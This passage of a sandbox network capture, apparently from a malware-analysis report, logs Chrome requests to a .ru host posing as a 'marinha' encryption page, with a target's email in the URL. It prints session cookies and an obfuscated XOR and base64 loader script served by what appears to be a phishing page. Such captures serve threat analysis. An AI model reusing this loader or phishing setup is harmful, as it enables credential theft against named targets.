                                                                  2025-03-14 11:30:56 UTC777OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 59 48 77 38 41 34 4a 59 75 41 31 44 37 5a 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 6c 74 70 67 22 0d 0a 0d 0a 61 67 65 6e 65 6c 69 6e 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 59 48 77 38 41 34 4a 59 75 41 31 44 37 5a 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 69 64 22 0d 0a 0d 0a 73 68 31 39 4c 79 37 31 4a 63 6f 6d 73 52 71 4a 6b 53 4d 74 4c 48 44 6b 41 55 47 47 51 58 51 52 4f 61 41 66 7a 47 78 6f 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 59
                                                                  Data Ascii: ------WebKitFormBoundaryYHw8A4JYuA1D7ZVUContent-Disposition: form-data; name="bltpg"agenelin------WebKitFormBoundaryYHw8A4JYuA1D7ZVUContent-Disposition: form-data; name="sid"sh19Ly71JcomsRqJkSMtLHDkAUGGQXQROaAfzGxo------WebKitFormBoundaryY
                                                                  2025-03-14 11:30:56 UTC1178INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:30:56 GMT
                                                                  Content-Type: application/json
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: no-cache, private
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iSMniVbB%2FBCOO1Z3qjVjolxIYJPSX7HimnIPoMqydPGZpui%2FZ%2Bdgikiv6WFxndI4ZL5%2FyjNbUsiwXZct5DD%2Bf33yr0ROV5OXzlP3bEz3piYA3j1MHjLl%2FggDd9R7"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4235&min_rtt=4235&rtt_var=1589&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=3195&delivery_rate=671698&cwnd=251&unsent_bytes=0&cid=3e76edc7f88df523&ts=97&x=0"
                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6Im05ZXRzT01LL0lkSVJUa29iOTN4UEE9PSIsInZhbHVlIjoiU1pVdytEenVRK0I5L2cwNVhsWkZIbTlkZWpJNVFVSFF4SkxHbkp3YVEvdkc5TlM1cDF3ZzdHVEZkNmc2NXFRM2Q5bVJ6Qm5seTArcW1PMGVUT3pnYW5jcXF1SzZQdW5EeGhwR09FZ2dWcFM3SFQrRjJWb0Q3d3IyOHdOaHhoU3UiLCJtYWMiOiJmNmY0NjIxNDdlMTBiMWUxYzhjODljYTZhNjhkM2VkMmM1OGYzNjUwZmVhMTFjODhmMjRlMDBhNDc1Nzg3Y2Q0IiwidGFnIjoiIn0%3D; expires=Fri, 14-Mar-2025 13:30:56 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                  2025-03-14 11:30:56 UTC785INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 31 6b 55 6c 6c 52 56 55 73 72 63 46 42 53 65 6b 46 32 59 6a 6c 77 53 48 46 35 61 56 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4d 33 67 7a 64 45 78 6c 56 55 39 6f 59 6d 4e 6f 53 7a 42 6a 5a 31 4e 75 56 45 46 71 61 6c 6c 4a 51 30 6f 72 57 6d 46 5a 53 32 70 4d 52 46 52 55 64 33 56 44 4f 48 46 72 4d 6a 42 35 53 32 6b 77 65 58 6c 6a 5a 55 70 6f 54 6b 6c 74 61 53 39 52 4e 57 46 44 57 45 68 47 56 45 39 4b 4f 58 56 70 63 55 67 32 62 31 4e 6a 64 6d 68 4d 5a 79 74 6a 53 33 68 56 55 32 46 4b 64 46 51 30 61 6a 67 76 65 55 56 32 54 55 74 48 4e 46 6f 32 65 45 68 52 62 6a 4a 44 64 57 77 33 63 45 56 6b 54 54 5a 31 51 55 5a 71 55 6e 5a 7a 59 55 59
                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Im1kUllRVUsrcFBSekF2YjlwSHF5aVE9PSIsInZhbHVlIjoiM3gzdExlVU9oYmNoSzBjZ1NuVEFqallJQ0orWmFZS2pMRFRUd3VDOHFrMjB5S2kweXljZUpoTkltaS9RNWFDWEhGVE9KOXVpcUg2b1NjdmhMZytjS3hVU2FKdFQ0ajgveUV2TUtHNFo2eEhRbjJDdWw3cEVkTTZ1QUZqUnZzYUY
                                                                  2025-03-14 11:30:56 UTC26INData Raw: 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 7d 0d 0a
                                                                  Data Ascii: 14{"status":"success"}
                                                                  2025-03-14 11:30:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.449735104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:57 UTC1554OUTGET /PtM2i/$nadia.sofia.rijo@marinha.pt HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  Cache-Control: max-age=0
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6Im05ZXRzT01LL0lkSVJUa29iOTN4UEE9PSIsInZhbHVlIjoiU1pVdytEenVRK0I5L2cwNVhsWkZIbTlkZWpJNVFVSFF4SkxHbkp3YVEvdkc5TlM1cDF3ZzdHVEZkNmc2NXFRM2Q5bVJ6Qm5seTArcW1PMGVUT3pnYW5jcXF1SzZQdW5EeGhwR09FZ2dWcFM3SFQrRjJWb0Q3d3IyOHdOaHhoU3UiLCJtYWMiOiJmNmY0NjIxNDdlMTBiMWUxYzhjODljYTZhNjhkM2VkMmM1OGYzNjUwZmVhMTFjODhmMjRlMDBhNDc1Nzg3Y2Q0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im1kUllRVUsrcFBSekF2YjlwSHF5aVE9PSIsInZhbHVlIjoiM3gzdExlVU9oYmNoSzBjZ1NuVEFqallJQ0orWmFZS2pMRFRUd3VDOHFrMjB5S2kweXljZUpoTkltaS9RNWFDWEhGVE9KOXVpcUg2b1NjdmhMZytjS3hVU2FKdFQ0ajgveUV2TUtHNFo2eEhRbjJDdWw3cEVkTTZ1QUZqUnZzYUYiLCJtYWMiOiI3ZTczOWQyZjNhMzFjN2U2NWQzNDBiZDJiZjZhNjI0M2QyYWQ3NTY2ZTYxNzIxMTZlZGIzMGEzMzAwZTUzNWVlIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:30:57 UTC1206INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:30:57 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: no-cache, private
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zaSjR%2FjMNreC6Jfz7l%2BunmEkLPuagYeKnku9D6pD4318CVfCZfRvApYLQ4Phs4FIg6nMa%2FlLWQsGKUTtSElKaqGPIjDkXMyDaJLoFT92Vi074QZ2%2BilJjIy1AwC2"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4767&min_rtt=4621&rtt_var=1395&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2456&delivery_rate=603389&cwnd=251&unsent_bytes=0&cid=d805e40e6ac24752&ts=115&x=0"
                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6ImpTYThVRU5ha2hWclFtSnY2ZXhlQ0E9PSIsInZhbHVlIjoiaVlYVnFFQ2JRQkxtS3Badnk0OGh4bHdoOWlSbjlzSFE5YlNORnVVVDQ2cFhzZ0RHeTFDME9raUkvT3J2RHZxTjJnTTNoVXBIVG1mcUZDTlI0WlFwYW5MRE5FYUNXZ0kwL3BjY1hwdFJaK2hZZ3doSjRTb2RNMXRGUW04bVFYQUoiLCJtYWMiOiI5MGZjNTk2MzhmYzc0MTljMjkyZjEyYjExMDA2MTU2ODY0NDZmZGMwNGE5ZDVlOWVjMzYxZmIyZTQ2YTQ3ODkxIiwidGFnIjoiIn0%3D; expires=Fri, 14-Mar-2025 13:30:57 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                  2025-03-14 11:30:57 UTC761INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 5a 35 4e 6c 64 6f 52 45 46 4d 62 47 45 33 64 44 4e 42 5a 48 52 4d 63 7a 4a 74 4d 31 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 64 6b 6c 72 61 55 39 61 5a 55 34 32 61 55 6c 79 55 32 56 69 53 6a 46 72 51 55 52 30 4e 30 46 36 64 45 46 70 4c 31 70 44 63 44 68 4a 4e 7a 4e 32 64 45 59 7a 61 6a 52 36 64 45 74 6a 51 32 6f 7a 64 47 73 78 52 54 4e 50 52 45 68 75 51 31 51 32 4e 30 74 58 4d 55 30 77 5a 31 4a 70 4f 57 78 6c 63 46 4e 34 65 46 56 4a 61 44 4d 34 53 45 78 4c 4d 47 59 35 63 48 68 7a 57 54 67 77 5a 30 6f 31 63 48 49 34 63 6b 77 78 56 48 4a 32 52 6b 46 6e 62 55 5a 73 4d 69 39 73 65 6b 64 69 51 30 55 30 57 57 78 74 4e 55 74 5a 55 56 6b
                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InZ5NldoREFMbGE3dDNBZHRMczJtM1E9PSIsInZhbHVlIjoidklraU9aZU42aUlyU2ViSjFrQUR0N0F6dEFpL1pDcDhJNzN2dEYzajR6dEtjQ2ozdGsxRTNPREhuQ1Q2N0tXMU0wZ1JpOWxlcFN4eFVJaDM4SExLMGY5cHhzWTgwZ0o1cHI4ckwxVHJ2RkFnbUZsMi9sekdiQ0U0WWxtNUtZUVk
                                                                  2025-03-14 11:30:57 UTC1369INData Raw: 38 62 65 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 42 56 72 6a 52 54 44 6a 42 50 28 78 54 4e 67 49 45 41 56 59 4f 2c 20 6b 67 77 68 63 78 48 4e 54 45 29 20 7b 0d 0a 6c 65 74 20 52 68 64 46 55 51 53 54 4e 72 20 3d 20 27 27 3b 0d 0a 78 54 4e 67 49 45 41 56 59 4f 20 3d 20 61 74 6f 62 28 78 54 4e 67 49 45 41 56 59 4f 29 3b 0d 0a 6c 65 74 20 62 4c 6e 75 4c 4f 48 71 4a 42 20 3d 20 6b 67 77 68 63 78 48 4e 54 45 2e 6c 65 6e 67 74 68 3b 0d 0a 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 78 54 4e 67 49 45 41 56 59 4f 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 52 68 64 46 55 51 53 54 4e 72 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 78 54 4e 67 49 45 41 56 59 4f 2e 63 68 61 72 43 6f
                                                                  Data Ascii: 8be<script>function BVrjRTDjBP(xTNgIEAVYO, kgwhcxHNTE) {let RhdFUQSTNr = '';xTNgIEAVYO = atob(xTNgIEAVYO);let bLnuLOHqJB = kgwhcxHNTE.length;for (let i = 0; i < xTNgIEAVYO.length; i++) { RhdFUQSTNr += String.fromCharCode(xTNgIEAVYO.charCo
                                                                  2025-03-14 11:30:57 UTC876INData Raw: 4c 44 4d 68 4f 78 4d 43 4a 43 4e 51 45 67 59 6d 41 6a 64 47 44 68 77 7a 44 78 6c 6a 47 43 30 47 44 51 49 37 50 42 49 42 45 69 55 4a 4d 53 45 6f 47 6a 4d 6d 48 57 4d 59 49 51 31 48 4c 79 52 5a 45 67 77 45 50 67 49 64 4e 79 63 4c 49 43 49 4a 4d 68 67 6d 46 52 4d 76 4c 79 74 57 41 52 49 66 56 54 63 5a 45 56 6f 67 4b 52 6f 73 4e 54 49 42 42 79 38 6b 4a 77 34 70 41 67 74 56 47 78 30 6b 58 41 6f 50 48 6a 6b 64 4a 68 59 47 50 44 51 46 4a 53 70 6e 41 77 6b 62 48 53 64 66 4a 79 49 4b 62 42 30 6b 5a 44 38 76 4c 79 67 47 41 52 59 51 41 68 30 33 4a 77 73 67 49 67 6b 79 4e 42 77 57 48 67 49 6b 49 78 49 48 50 42 4e 56 4e 78 6f 77 41 43 55 69 43 69 38 77 49 6a 67 5a 41 69 67 47 42 69 77 64 47 31 51 4f 4a 78 45 4c 43 46 4d 65 59 41 42 58 62 52 38 38 4f 41 59 47 42 69 38
                                                                  Data Ascii: LDMhOxMCJCNQEgYmAjdGDhwzDxljGC0GDQI7PBIBEiUJMSEoGjMmHWMYIQ1HLyRZEgwEPgIdNycLICIJMhgmFRMvLytWARIfVTcZEVogKRosNTIBBy8kJw4pAgtVGx0kXAoPHjkdJhYGPDQFJSpnAwkbHSdfJyIKbB0kZD8vLygGARYQAh03JwsgIgkyNBwWHgIkIxIHPBNVNxowACUiCi8wIjgZAigGBiwdG1QOJxELCFMeYABXbR88OAYGBi8
                                                                  2025-03-14 11:30:57 UTC1369INData Raw: 31 34 39 30 0d 0a 63 4c 44 79 6b 2f 4d 67 73 39 44 68 67 45 41 6a 67 55 4b 32 63 35 46 51 34 61 4e 43 41 7a 4f 53 4d 6c 47 43 59 4e 47 53 49 39 42 67 59 42 46 68 41 43 48 54 63 6e 43 79 41 69 43 54 49 59 4a 68 55 62 4c 7a 51 76 56 52 34 43 49 53 38 42 52 44 41 75 43 69 63 46 49 44 4d 79 41 6b 51 2f 50 79 74 5a 4c 68 59 54 43 54 41 5a 4d 42 6b 4e 49 6e 30 68 43 7a 30 47 48 44 56 65 50 31 51 44 42 68 41 49 48 68 4e 57 4a 79 41 69 43 54 49 59 4a 68 55 54 4c 79 38 6f 42 67 45 57 45 41 49 66 4e 79 41 55 44 43 63 65 4a 41 49 7a 47 6a 49 33 4e 43 73 31 42 44 67 58 46 6a 41 33 4a 46 51 50 49 67 6f 35 4e 51 67 43 41 51 49 76 58 41 6b 71 48 51 4d 70 44 69 77 4e 48 43 41 69 45 54 67 56 4e 44 73 54 4c 79 38 6f 42 67 45 57 45 41 49 64 4e 79 63 4c 49 43 49 4b 4f 54 55
                                                                  Data Ascii: 1490cLDyk/Mgs9DhgEAjgUK2c5FQ4aNCAzOSMlGCYNGSI9BgYBFhACHTcnCyAiCTIYJhUbLzQvVR4CIS8BRDAuCicFIDMyAkQ/PytZLhYTCTAZMBkNIn0hCz0GHDVeP1QDBhAIHhNWJyAiCTIYJhUTLy8oBgEWEAIfNyAUDCceJAIzGjI3NCs1BDgXFjA3JFQPIgo5NQgCAQIvXAkqHQMpDiwNHCAiETgVNDsTLy8oBgEWEAIdNycLICIKOTU
                                                                  2025-03-14 11:30:57 UTC1369INData Raw: 43 49 4b 49 77 4d 6a 42 67 30 43 41 43 74 55 48 6d 63 58 4e 78 30 77 56 67 73 4e 4b 51 4a 6b 43 7a 45 6e 4f 69 55 46 4b 41 59 42 46 68 41 43 48 54 63 6e 43 79 41 69 43 54 49 59 4c 54 41 45 42 41 45 37 46 79 77 73 5a 42 59 32 52 69 67 45 44 53 59 6b 49 7a 4d 4d 59 51 30 38 4e 43 73 53 45 51 49 66 43 52 38 33 41 67 4d 4e 4b 52 6f 69 4d 68 38 37 41 69 70 65 44 52 63 71 5a 7a 55 57 44 69 64 54 42 67 74 54 65 44 73 61 4d 53 63 36 4a 51 55 6f 42 67 45 57 45 41 49 64 4e 79 63 4c 44 7a 42 34 48 68 67 6d 46 52 4d 76 4a 46 6b 53 41 52 45 55 45 68 6b 33 44 56 73 74 4d 44 68 73 47 6a 59 7a 42 43 6b 62 56 46 78 76 66 48 68 4e 66 55 39 72 5a 6c 56 4f 4f 7a 59 6a 44 43 51 41 57 47 46 6a 58 54 73 32 49 77 77 6b 41 46 68 68 59 77 63 39 4f 7a 49 52 50 52 73 49 54 41 34 6e
                                                                  Data Ascii: CIKIwMjBg0CACtUHmcXNx0wVgsNKQJkCzEnOiUFKAYBFhACHTcnCyAiCTIYLTAEBAE7FywsZBY2RigEDSYkIzMMYQ08NCsSEQIfCR83AgMNKRoiMh87AipeDRcqZzUWDidTBgtTeDsaMSc6JQUoBgEWEAIdNycLDzB4HhgmFRMvJFkSAREUEhk3DVstMDhsGjYzBCkbVFxvfHhNfU9rZlVOOzYjDCQAWGFjXTs2IwwkAFhhYwc9OzIRPRsITA4n
                                                                  2025-03-14 11:30:57 UTC1369INData Raw: 4d 76 4c 79 67 47 41 52 59 51 41 68 30 7a 44 67 41 77 4e 68 6f 35 4d 67 77 57 47 79 73 2f 4b 31 59 4c 50 42 41 43 48 54 63 6e 43 79 41 69 43 54 49 59 4a 68 55 54 4c 79 74 59 43 53 73 34 4e 52 55 32 48 67 6b 4c 4a 43 55 37 48 68 67 6d 46 52 4d 76 4c 79 67 47 41 52 59 51 41 68 30 33 4a 77 73 7a 44 48 45 67 4e 53 5a 6c 44 67 63 30 47 51 30 48 50 42 41 66 47 52 6f 6b 57 43 59 57 4a 7a 49 59 4a 68 55 54 4c 79 38 6f 42 67 45 57 45 41 49 64 4e 79 51 47 43 31 4d 77 49 7a 49 50 4f 78 4d 76 58 6a 4d 4d 45 6a 67 4c 43 41 34 65 46 53 63 67 49 67 6b 79 47 43 59 56 45 79 38 76 4b 31 67 4c 50 42 41 43 48 54 63 6e 43 79 41 69 43 54 49 7a 43 42 4a 47 4c 79 51 61 4b 67 45 57 45 41 49 64 4e 79 63 4c 49 43 49 4a 4d 68 67 6d 46 52 4d 45 4f 79 38 59 45 6d 63 39 45 42 67 73 4e
                                                                  Data Ascii: MvLygGARYQAh0zDgAwNho5MgwWGys/K1YLPBACHTcnCyAiCTIYJhUTLytYCSs4NRU2HgkLJCU7HhgmFRMvLygGARYQAh03JwszDHEgNSZlDgc0GQ0HPBAfGRokWCYWJzIYJhUTLy8oBgEWEAIdNyQGC1MwIzIPOxMvXjMMEjgLCA4eFScgIgkyGCYVEy8vK1gLPBACHTcnCyAiCTIzCBJGLyQaKgEWEAIdNycLICIJMhgmFRMEOy8YEmc9EBgsN
                                                                  2025-03-14 11:30:57 UTC1165INData Raw: 66 46 54 45 5a 4d 31 6f 67 4a 51 31 68 4d 69 30 7a 51 79 55 46 4b 41 59 42 46 68 41 43 48 54 63 6e 43 77 38 77 4a 7a 49 59 4a 68 55 54 4c 79 38 6f 42 67 45 57 5a 41 67 4f 49 79 42 63 44 54 6b 43 4f 54 49 63 46 6b 4d 6c 42 53 67 47 41 52 59 51 41 68 30 33 4a 77 73 67 49 67 6b 79 47 43 49 47 42 41 56 66 4b 78 49 52 44 54 70 54 48 54 4d 38 48 7a 4d 35 4c 32 49 53 44 42 55 54 4c 79 38 6f 42 67 45 57 45 41 49 64 4e 79 63 4c 49 43 59 53 4a 67 73 39 4d 77 41 43 58 79 4d 4a 4b 78 45 2b 41 6a 42 48 4c 41 51 4b 4a 54 73 65 47 43 59 56 45 79 38 76 4b 41 59 42 46 68 41 43 48 54 63 6e 43 7a 4e 54 44 69 49 65 44 42 55 4e 4b 79 51 72 56 51 63 69 50 67 49 64 4e 79 63 4c 49 43 49 4a 4d 68 67 74 5a 44 38 76 4c 79 67 47 41 52 59 51 41 68 30 33 4a 78 6b 7a 44 42 34 39 4e 53
                                                                  Data Ascii: fFTEZM1ogJQ1hMi0zQyUFKAYBFhACHTcnCw8wJzIYJhUTLy8oBgEWZAgOIyBcDTkCOTIcFkMlBSgGARYQAh03JwsgIgkyGCIGBAVfKxIRDTpTHTM8HzM5L2ISDBUTLy8oBgEWEAIdNycLICYSJgs9MwACXyMJKxE+AjBHLAQKJTseGCYVEy8vKAYBFhACHTcnCzNTDiIeDBUNKyQrVQciPgIdNycLICIJMhgtZD8vLygGARYQAh03JxkzDB49NS
                                                                  2025-03-14 11:30:57 UTC1369INData Raw: 31 32 38 35 0d 0a 30 54 42 53 38 72 56 67 73 38 45 41 49 64 4e 79 63 4c 49 43 49 4a 4d 68 67 6d 46 52 4d 76 4b 31 67 4a 4b 7a 67 31 46 54 59 65 43 51 73 6b 4a 54 73 65 47 43 59 56 45 79 38 76 4b 41 59 42 46 68 41 43 48 54 63 6e 43 7a 42 54 63 53 59 7a 56 68 31 43 4c 79 38 6e 44 42 49 34 43 77 67 4f 47 54 39 62 4b 67 67 4a 4d 68 67 6d 46 52 4d 76 4c 79 67 47 4c 67 51 2b 41 68 30 33 4a 77 73 35 49 6e 45 76 4e 53 30 34 42 7a 77 34 58 53 6f 59 46 6d 67 4b 44 69 4d 67 42 7a 6b 47 4a 32 30 49 43 47 30 66 41 7a 68 64 4b 67 45 57 45 41 49 64 4d 42 34 44 4d 7a 59 4f 50 67 73 39 48 56 38 6c 42 53 67 47 41 52 59 51 41 68 30 33 4a 77 73 35 4a 69 38 74 41 51 34 53 50 69 38 71 50 79 73 42 45 43 55 56 4d 44 41 52 47 67 67 6c 44 58 34 53 44 42 55 54 4c 79 38 6f 42 67 45
                                                                  Data Ascii: 12850TBS8rVgs8EAIdNycLICIJMhgmFRMvK1gJKzg1FTYeCQskJTseGCYVEy8vKAYBFhACHTcnCzBTcSYzVh1CLy8nDBI4CwgOGT9bKggJMhgmFRMvLygGLgQ+Ah03Jws5InEvNS04Bzw4XSoYFmgKDiMgBzkGJ20ICG0fAzhdKgEWEAIdMB4DMzYOPgs9HV8lBSgGARYQAh03Jws5Ji8tAQ4SPi8qPysBECUVMDARGgglDX4SDBUTLy8oBgE
                                                                  2025-03-14 11:30:57 UTC1369INData Raw: 79 73 6e 45 68 45 4e 48 78 38 45 4a 79 77 42 4d 7a 59 4f 5a 54 55 39 48 68 67 76 42 6c 30 71 41 52 59 51 41 68 30 33 4a 77 73 67 49 67 6b 79 47 43 59 56 45 79 38 76 4b 41 59 42 46 68 41 43 48 54 63 6e 56 41 67 6c 42 58 34 46 4d 68 49 65 42 79 73 46 46 42 49 47 45 79 67 4f 49 79 41 56 43 77 77 6b 49 41 73 66 49 77 49 48 4b 43 52 4b 43 7a 77 51 41 68 30 33 4a 77 73 67 49 67 6b 79 47 43 59 56 45 79 38 76 4b 41 59 42 46 68 41 43 48 54 63 6e 43 7a 6b 70 43 58 34 43 49 68 49 4e 42 41 45 2f 47 79 73 73 45 31 55 31 4d 7a 4d 4c 43 69 5a 78 5a 67 73 39 48 52 4d 45 58 6a 41 47 4b 67 49 58 44 7a 55 7a 43 68 6b 7a 4d 67 6f 6d 43 7a 49 53 44 51 51 42 42 52 51 53 4c 42 4d 4e 4e 6a 4d 43 47 67 6f 4d 4a 47 55 77 49 6d 55 4f 4c 79 51 37 46 77 45 53 46 78 41 4e 49 78 35 5a
                                                                  Data Ascii: ysnEhENHx8EJywBMzYOZTU9HhgvBl0qARYQAh03JwsgIgkyGCYVEy8vKAYBFhACHTcnVAglBX4FMhIeBysFFBIGEygOIyAVCwwkIAsfIwIHKCRKCzwQAh03JwsgIgkyGCYVEy8vKAYBFhACHTcnCzkpCX4CIhINBAE/GyssE1U1MzMLCiZxZgs9HRMEXjAGKgIXDzUzChkzMgomCzISDQQBBRQSLBMNNjMCGgoMJGUwImUOLyQ7FwESFxANIx5Z
                                                                  2025-03-14 11:30:57 UTC1369INData Raw: 38 64 4d 7a 41 5a 44 53 59 67 5a 44 4a 58 4f 42 77 46 58 7a 73 62 41 52 49 44 43 51 34 7a 43 67 59 77 4f 52 6f 35 43 79 59 57 52 41 51 56 4b 77 73 72 4f 41 63 4e 4d 44 4d 4b 47 54 4d 59 43 69 55 7a 43 47 45 43 41 67 45 76 55 53 6b 4e 43 77 6b 64 50 43 67 61 43 79 6b 65 5a 54 41 79 62 51 45 46 46 53 74 52 4b 52 49 58 56 52 30 38 4a 46 30 4b 55 79 38 79 4e 53 49 38 47 43 38 72 49 78 63 73 41 6d 51 4f 44 53 77 73 48 44 4d 35 42 54 49 7a 56 77 30 54 41 69 73 2f 43 79 6b 53 5a 42 4d 32 4d 31 38 43 44 44 4a 38 62 52 31 57 46 56 38 6c 42 53 67 47 41 52 59 51 41 68 30 33 4a 77 73 35 49 6e 45 76 43 7a 49 61 52 41 63 37 55 42 51 59 4d 6a 34 43 48 54 63 6e 43 79 41 69 43 54 49 59 49 53 77 4f 50 44 73 6e 55 53 6b 43 61 42 41 64 4d 77 6f 48 4f 54 49 43 50 7a 4e 58 59
                                                                  Data Ascii: 8dMzAZDSYgZDJXOBwFXzsbARIDCQ4zCgYwORo5CyYWRAQVKwsrOAcNMDMKGTMYCiUzCGECAgEvUSkNCwkdPCgaCykeZTAybQEFFStRKRIXVR08JF0KUy8yNSI8GC8rIxcsAmQODSwsHDM5BTIzVw0TAis/CykSZBM2M18CDDJ8bR1WFV8lBSgGARYQAh03Jws5InEvCzIaRAc7UBQYMj4CHTcnCyAiCTIYISwOPDsnUSkCaBAdMwoHOTICPzNXY


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.449736104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:57 UTC1526OUTPOST /rquUC4Ujp4cw4zkB8xlNj4eutC2Tc0rbylyh7BoD07FyJgw1fYfAgy HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  Content-Length: 36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  X-Requested-With: XMLHttpRequest
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                  sec-ch-ua-mobile: ?0
                                                                  Origin: https://encryption-marinha.jkndfuzv.ru
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
